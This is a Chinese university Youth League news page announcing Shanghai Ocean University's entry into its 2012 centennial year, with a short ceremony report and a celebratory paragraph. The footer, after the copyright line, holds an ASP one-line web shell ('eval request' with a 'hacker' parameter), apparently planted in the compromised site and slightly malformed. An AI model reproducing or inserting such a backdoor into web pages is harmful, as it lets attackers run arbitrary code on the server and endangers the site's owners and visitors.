当前位置:共青团上海海洋大学委员会 >> 志愿服务 >> 志愿活动 >> 正文  
站内信息搜索:
欢庆百年 喜迎新岁——上海海洋大学迈入百年校庆年
[2012年02月29日]   来源:本站原创   作者:佚名   点击数: 【字体: 】【双击滚屏

玉兔欢歌辞旧岁,蛟龙起舞迎新年。2011年的最后一个工作日,在图文信息中心广场,校后勤管理处处长俞渊、校团委书记夏雅敏与百名学生代表一起将广场中“再铸世纪辉煌”宣传牌中的2011年更替为2012年,喜迎百年校庆年,共度美好时光。

2012是学校的百年校庆年,回首昨日,探索和收获同在;展望明天,机遇与挑战并存。“勤朴忠实”的海大人,在2012年,必将以广阔的视野、开放的姿态、饱满的热情、务实的精神、执着的努力,奏响更加豪迈的旋律,开创更加辉煌的业绩,谱写百年校庆壮丽的篇章!

(撰稿:李杰)

 

关闭窗口

上一篇:校领导看望慰问我校世界游泳锦标赛志愿者

下一篇:百名校友访谈录之:带着理想与信念起航
  留言板 | 管理登录 版权所有 © 2007 共青团上海海洋大学委员会 tw.shou.edu.cn <% eval request((hacker) %>